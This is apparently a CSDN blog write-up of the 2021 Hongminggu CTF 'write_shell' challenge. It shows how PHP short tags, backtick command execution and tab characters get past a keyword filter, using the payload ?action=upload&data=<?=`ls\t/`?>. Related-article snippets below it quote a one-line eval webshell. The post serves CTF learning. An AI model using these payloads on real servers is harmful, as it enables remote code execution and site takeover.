[红明谷CTF 2021]write_shell php短标签绕过

最新推荐文章于 2025-03-26 20:19:36 发布
最新推荐文章于 2025-03-26 20:19:36 发布
阅读量3.8k 收藏 3
点赞数 1
文章标签: python docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/121589413
版权

[红明谷CTF 2021]write_shell
考的是php里的绕过,因为正则过滤了php ; ~ eval等字符,所以php标签<?php?>写入不了
https://xz.aliyun.com/t/8107#toc-11这个文章讲绕过讲的挺详细的
对于这道题目可以用<?= ?>代替php标签。<?= ?>短标签会直接把php的结果输出,<? ?>的功能则和<?php?>完全一样。过滤空格可以用\t绕过,或者%09也是tab的URL编码。php反引号中的字符串会被当作命令执行。

?action=upload&data=<?=`ls\t/`?>

结果会写在pwd查到的文件夹下的index.php文件里
本来想再试试取反和异或绕过的,这两个都算是万金油绕过方式了,但是在这里都被禁了。那就贴一个求异或绕过的脚本吧

<?php
$shell = "phpinfo()";
$result1 = "";
$result2 = "";
最低0.47元/天 解锁文章
scrawman
关注
文件上传漏洞(漏洞产生因素、前端验证绕过php标签绕过)
ShenZ的博客
08-07 1407
文件上传漏洞 copy xx.png/b+xx.txt xx.png 在嵌入了php脚本的html中,使用 phtml作为后缀名 php,php3,php4,php5,phtml.pht 上传漏洞相关因素 1.可解析的后缀, 也就是该语言有多个可解析的后缀,比如php语言可解析的后缀为php,php2,php3等等 2.大小写混合, 如果系统过滤不严,可能大小写可以绕过。 3.中间件, 每款中间件基本都解析漏洞,比如iis就可以把xxx.asp;.jpg当asp来执行。 4.系统特性, 特别是Window
php绕过html标签,php特殊字符过滤,html标签处理
weixin_39802814的博客
06-22 775
1,magic_quotes_gpc默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。其实这...
PHP短标签、双写绕过
2401_82985722的博客
03-19 426
文件中包含了PHP代码,但是在上下文中不被允许。(后端利用正则限制匹配PHPphp)上传的文件类型不是有效的 JPEG 图片格式。短标签会直接把php的结果输出,原来的路径中存在php。用pphpph双写绕过。·这都不做(web)(此题免杀马不可用)连接蚁剑,得flag。
PHP 代码执行漏洞:详细解析与绕过方法
最新发布
智商不在服务区的博客
03-26 1043
在 Web 安全中,PHP 代码执行漏洞是一类非常严重的安全隐患。攻击者利用这些漏洞不仅可以执行任意代码,还能进一步窃取敏感数据、植入后门,甚至控制整台服务器。尤其是在 CTF(Capture The Flag)比赛中,利用代码执行漏洞获取“flag”是常见的题目类型。通过以上示例可以看出,当过滤规则不够全面或过于依赖关键字屏蔽时,攻击者仍然可以利用字符拆分、特殊空白、数据流协议、以及内置变量等技巧绕过防护,实现代码执行或文件读取。避免动态执行用户输入:永远不要直接使用eval()
2024.3.23日报(短标签绕过
2302_80946742的博客
03-24 602
`,而短标签则是`
PHP代码层防护与绕过
10-24 470
0x01 前言   在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。   这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。   Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。 0x02 关键字过滤 ...
php中的短标签 太坑人了
weixin_33811539的博客
09-26 163
今天配置了一个php页面去修改svn密码问题,结果调了半天,最后在Windows和 Linux的运行现象是不一样,运行结果更不一样了,关键是完全一模一样的代码。 最后发现是短标签引起的,Windows环境中短标签默认是打开的,Linux下 默认是关闭的。 控制参数: short_open_tag = On 如果设置为Off,则不能正常解析类似于这样形式的php文件: phpinfo...
PHP开启短标签
李木
10-07 1911
控制参数: php.ini 中 搜索 short_open_tag = On 如果设置为Off,则不能正常解析类似于这样形式的php文件: phpinfo() ?&gt; 而只能解析 &lt;?php phpinfo() ?&gt; 这样形式的php文件 所以要想php支持短标签,需要我们把short_open_tag 设置为On.   &lt;?php  这是完整标签 &lt;?  这是...
[CTF 2021]write_shell
m0_63045593的博客
04-20 312
[CTF 2021]write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{
2023杯部分WP
就这样吧
04-21 1398
2023杯部分WP
【2024】三道Web题目的记录
jayq1的博客
04-03 1435
三道Web题目的记录与分享,希望对师傅们有所帮助,有理解不当之处也希望师傅们及时指正,感恩!
BUUCTF:[CTF 2021]write_shell --- php 短标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1613
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑短标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP短标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP短标签 关于PHP的??这个东西:讲
20210221CTF小记之bugkuCTF冬至包(短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制)
qq_45290991的博客
02-22 2440
今天做了一道很恶心的题目,话不多说,先上结果图: 我们先来分析代码: 当没有用GET方法传入flag时,会显示Click here的链接。 点击链接会用GET方法传入一串字符串$exam,后面是当前时间的一串sha1哈希值。 判断传入的flag长度与$exam是否相同,不同则显示 长度不允许 第二个判断过滤了一大堆 第三个判断传入flag的值等于flag值的哈希值,正确就输出flag。用的是严格的三个等号的比较,我们flag都不知道,哈希值更不可能知道了,== 但容易发现此处存在任意代码.
ctf 绕过php,Bugku-CTF之各种绕过
weixin_39799290的博客
03-19 486
Bugku-CTF之各种绕过本题要点:php代码审计、hackbar利用highlight_file(‘flag.php‘);$_GET[‘id‘] = urldecode($_GET[‘id‘]);$flag = ‘flag{xxxxxxxxxxxxxxxxxx}‘;if (isset($_GET[‘uname‘]) and isset($_POST[‘passwd‘])) {if ($_GET...
php短标签_如何禁用PHP短开放标签?
cuma2369的博客
07-27 381
php短标签Some of my pages has XML tags like ‘<?xml ?>’ which are considered by PHP as short open tags ‘<? ?>’. How to disable PHP short open tags? 我的某些页面具有XML标记,例如“ <?xml?>”,PHP将该标记视为短打...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值